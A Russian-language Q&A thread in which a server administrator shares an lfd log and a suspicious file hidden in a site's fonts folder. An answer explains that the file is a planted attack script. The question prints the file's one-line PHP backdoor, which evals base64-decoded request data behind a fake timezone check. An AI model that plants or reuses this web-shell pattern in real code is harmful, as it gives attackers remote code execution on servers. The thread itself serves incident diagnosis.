Вредоносная активность на EXE:/usr/bin/php CMD:/usr/bin/php

Возможный дубликат:
Как мне работать с взломанным сервером?

Проверяем lfd.log и замечаем журнал блокировки для скрипта:

Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php

Похоже, что скрипт пытается выполнить / usr / bin / php, но когда я вижу код, это простой однострочный файл

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

У кого-нибудь есть подобный опыт, и есть ли способ узнать, что является причиной вызова / usr / bin / php? В журналах говорится, что скрипт вызывается через POST.

php lfd

Источник

Armand 10 янв '13 в 22:31

1 ответ

Решение

Кто-то разместил скрипт атаки в этом каталоге. Если eval не деактивирован в вашей конфигурации PHP, это позволит злоумышленнику выполнить произвольный код PHP, который он отправляет вместе с запросом.

Сценарий вызывается с помощью простого HTTP-запроса POST.

Вы должны считать вашу систему скомпрометированной и попытаться выяснить, как злоумышленнику удалось разместить этот скрипт.

Источник

Sven 10 янв '13 в 22:46

Другие вопросы по тегам php lfd